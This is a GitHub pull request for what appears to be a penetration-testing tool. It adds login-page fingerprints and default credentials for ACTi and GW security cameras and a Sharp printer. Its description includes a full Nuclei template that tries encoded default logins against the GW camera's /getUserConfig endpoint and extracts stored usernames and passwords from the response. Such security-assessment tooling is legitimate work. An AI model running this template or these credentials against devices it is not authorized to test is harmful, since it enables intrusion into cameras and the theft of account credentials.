### PR TITLE
added GW Security Camera sigs

### DIFF
--- a/Python/categories.txt
+++ b/Python/categories.txt
@@ -799,3 +799,4 @@ content="RackStation;RackStation</title>|nas
 content="SEIKO EPSON">;/IMAGE/EPSONLOGO_NEW.PNG"|printer
 <title>Web Configurator</title>;<iframe id="main_frame"|camera
 <title>Login</title>;function hide_login_big_logo|camera
+<title>Machine Identification - BP-50C26</title>;function changeMyPage|printer

--- a/Python/categories.txt
+++ b/Python/categories.txt
@@ -797,3 +797,4 @@ function isIE();name="viewport";@keyframes rotate;THESE STYLES MUST|infrastructu
 content="RackStation;RackStation</title>|nas
 <img src="/image/cisco_logo_about.png">;Phone Adapter|voip
 content="SEIKO EPSON">;/IMAGE/EPSONLOGO_NEW.PNG"|printer
+<title>Web Configurator</title>;<iframe id="main_frame"|camera

--- a/Python/categories.txt
+++ b/Python/categories.txt
@@ -798,3 +798,4 @@ content="RackStation;RackStation</title>|nas
 <img src="/image/cisco_logo_about.png">;Phone Adapter|voip
 content="SEIKO EPSON">;/IMAGE/EPSONLOGO_NEW.PNG"|printer
 <title>Web Configurator</title>;<iframe id="main_frame"|camera
+<title>Login</title>;function hide_login_big_logo|camera

--- a/Python/signatures.txt
+++ b/Python/signatures.txt
@@ -460,7 +460,7 @@ tnt-fortinet-grid icon-xl;var xhr = new XMLHttpRequest();document.forms[0].usern
 <title>Emerson Network Power| Emerson UPS admin / Liebert
 <div id="loginLogo">;Storage Management Utility|HP Storage Management Utility - manage / !manage
 OpManager;$zoho.salesiq|Zoho Op Manager - admin / admin
-alt="Cisco Device Manager"|Cisco Device Manager - admin / admin 
+alt="Cisco Device Manager"|Cisco Device Manager - admin / admin
 <title>DG Inspector|Digital Guardian - admin / a10
 emc-logo;XtremIO Management</div>|EMC ExtremIO xmsadmin / 123456 or Xtrem10
 <title>Unisphere;Dell Inc|EMC Unisphere - admin / Password123#
@@ -472,3 +472,4 @@ function isIE();name="viewport";@keyframes rotate;THESE STYLES MUST|PowerProtect
 content="RackStation;RackStation</title>|Rackstation / admin : blank
 img src="/image/cisco_logo_about.png">;Phone Adapter|Cisco Phone Adaptor / admin : admin
 content="SEIKO EPSON">;/IMAGE/EPSONLOGO_NEW.PNG"|Epson Printer - no default credentials
+<title>Web Configurator</title>;<iframe id="main_frame"|ACTi Web Configurator Camera / admin:123456 or Admin:123456

--- a/Python/signatures.txt
+++ b/Python/signatures.txt
@@ -474,3 +474,4 @@ img src="/image/cisco_logo_about.png">;Phone Adapter|Cisco Phone Adaptor / admin
 content="SEIKO EPSON">;/IMAGE/EPSONLOGO_NEW.PNG"|Epson Printer - no default credentials
 <title>Web Configurator</title>;<iframe id="main_frame"|ACTi Web Configurator Camera / admin:123456 or Admin:123456
 <title>Login</title>;function hide_login_big_logo|GW Security Camera / admin:123456 or admin:admin or admin:888888
+<title>Machine Identification - BP-50C26</title>;function changeMyPage|Sharp Printer / Administrator:admin

--- a/Python/signatures.txt
+++ b/Python/signatures.txt
@@ -473,3 +473,4 @@ content="RackStation;RackStation</title>|Rackstation / admin : blank
 img src="/image/cisco_logo_about.png">;Phone Adapter|Cisco Phone Adaptor / admin : admin
 content="SEIKO EPSON">;/IMAGE/EPSONLOGO_NEW.PNG"|Epson Printer - no default credentials
 <title>Web Configurator</title>;<iframe id="main_frame"|ACTi Web Configurator Camera / admin:123456 or Admin:123456
+<title>Login</title>;function hide_login_big_logo|GW Security Camera / admin:123456 or admin:admin or admin:888888


### PR DESCRIPTION
tested and verified workin'

![image](https://github.com/user-attachments/assets/10f3dd20-c031-4ed5-8ee5-d1b02175abc3)

Here's a Nuclei template to go with it 💥 

```yaml
id: gw-security-camera-default-login

info:
  name: GW Security Camera Default Login
  author: mr-pmillz
  severity: high
  description: GW Security Camera Default Login
  reference:
    - https://gwsecurityusa.com/wp-content/Firmware/Cameras/50-54-60-80%20Series%20IP%20Cameras/GW50-54-80%20Series%20Quick%20Guide%2020170619.pdf
  tags: default-credentials,network-camera,camera

http:
  - raw:
      - |+
        POST /getUserConfig HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
        Accept: text/javascript, text/html, application/xml, text/xml, */*
        X-Requested-With: XMLHttpRequest
        Content-type: application/x-www-form-urlencoded
        Content-Length: 223
        Connection: close
        Cookie: DHLangCookie30=English

        <?xml version=\"1.0\"?><soap:Envelope xmlns:soap=\"http://www.w3.org/2001/12/soap-envelope\"\
                ><soap:Header>\t<userid>{{username}}</userid>\t<passwd>{{password}}</passwd></soap:Header><soap:Body></soap:Body></soap:Envelope>"
    payloads:
      username:
        - 52851dbd7918bbae # admin
      password:
        - a17faccd02661e4c # 123456
        - 7656e77274aca3c6 # 888888
        - 52851dbd7918bbae # admin
    attack: clusterbomb
    matchers-condition: and
    matchers:
      - type: status
        status:
        - 200
      - type: word
        part: body
        words:
          - "<UserConfig>"  # Check if the response contains the UserConfig tag

    extractors:
      - type: regex
        part: body
        name: "Extracted Credentials"
        regex:
          - 'Username="([^"]+)" Password="([^"]+)"'  # Extract both username and password in one regex
```